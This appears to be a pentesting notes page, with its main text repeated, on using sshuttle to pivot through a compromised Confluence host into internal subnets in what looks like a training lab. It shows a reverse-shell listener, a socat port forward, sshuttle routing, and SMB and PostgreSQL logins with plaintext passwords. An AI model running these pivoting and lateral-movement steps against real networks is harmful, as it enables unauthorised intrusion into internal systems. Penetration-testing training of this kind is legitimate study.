Sshuttle

Last updated 1 month ago

Was this helpful?

Sshuttle

sshuttle is a tool that creates a VPN-like tunnel over SSH. It transparently routes traffic to specified subnets through an SSH connection. It requires root privileges on the client (attacker) machine and Python 3 on the SSH server (pivot host).

Particularly useful when classic dynamic port forwarding is cumbersome to manage.

recap:

Got a reverse shell on CONFLUENCE01 (192.168.125.63) via CVE-2022-26134.
We can SSH to PGDATABASE01 (10.4.125.215) from CONFLUENCE01.
Our goal is to access the following internal networks: 10.4.125.0/24 and 172.16.125.0/24.

We can set up a port forward on CONFLUENCE01, forwarding local port 2222 to PGDATABASE01:22 using socat. This makes PGDATABASE01’s SSH service available on CONFLUENCE01:2222.

$ nc -lvnp 4444
...
confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty;pty.spawn("/bin/sh")'
$ socat TCP-LISTEN:2222,fork TCP:10.4.125.215:22

Then we can use sshuttle from Kali to route desired subnets through the forwarded SSH connection. -r specifies the SSH connection string (user@pivot_host:port) followed by the list of subnets to route.

$ sshuttle -r database_admin@192.168.125.63:2222 10.4.125.0/24 172.16.125.0/24
...
database_admin@192.168.125.63's password: #sqlpass123
client_input_hostkeys: hostkeys_foreach failed for /home/x7331/.ssh/known_hosts: Permission denied
c : Connected to server.

We can now test the pivoted access by connecting to an internal service (e.g., SMB on HRSHARES) without any additional port forwards.

$ smbclient -L //172.16.125.217/ -U hr_admin --password=Welcome1234

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Scripts         Disk
        Users           Disk
        
$ psql -h 10.4.125.215 -p 5432 -U postgres
Password for user postgres: # D@t4basePassw0rd!
...
postgres=#

PreviousLigolo-ng NextShells

Last updated 1 month ago

Was this helpful?

Particularly useful when classic dynamic port forwarding is cumbersome to manage.

recap:

Got a reverse shell on CONFLUENCE01 (192.168.125.63) via CVE-2022-26134.
We can SSH to PGDATABASE01 (10.4.125.215) from CONFLUENCE01.
Our goal is to access the following internal networks: 10.4.125.0/24 and 172.16.125.0/24.

We can set up a port forward on CONFLUENCE01, forwarding local port 2222 to PGDATABASE01:22 using socat. This makes PGDATABASE01’s SSH service available on CONFLUENCE01:2222.

$ nc -lvnp 4444
...
confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty;pty.spawn("/bin/sh")'
$ socat TCP-LISTEN:2222,fork TCP:10.4.125.215:22

$ sshuttle -r database_admin@192.168.125.63:2222 10.4.125.0/24 172.16.125.0/24
...
database_admin@192.168.125.63's password: #sqlpass123
client_input_hostkeys: hostkeys_foreach failed for /home/x7331/.ssh/known_hosts: Permission denied
c : Connected to server.

We can now test the pivoted access by connecting to an internal service (e.g., SMB on HRSHARES) without any additional port forwards.

$ smbclient -L //172.16.125.217/ -U hr_admin --password=Welcome1234

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Scripts         Disk
        Users           Disk
        
$ psql -h 10.4.125.215 -p 5432 -U postgres
Password for user postgres: # D@t4basePassw0rd!
...
postgres=#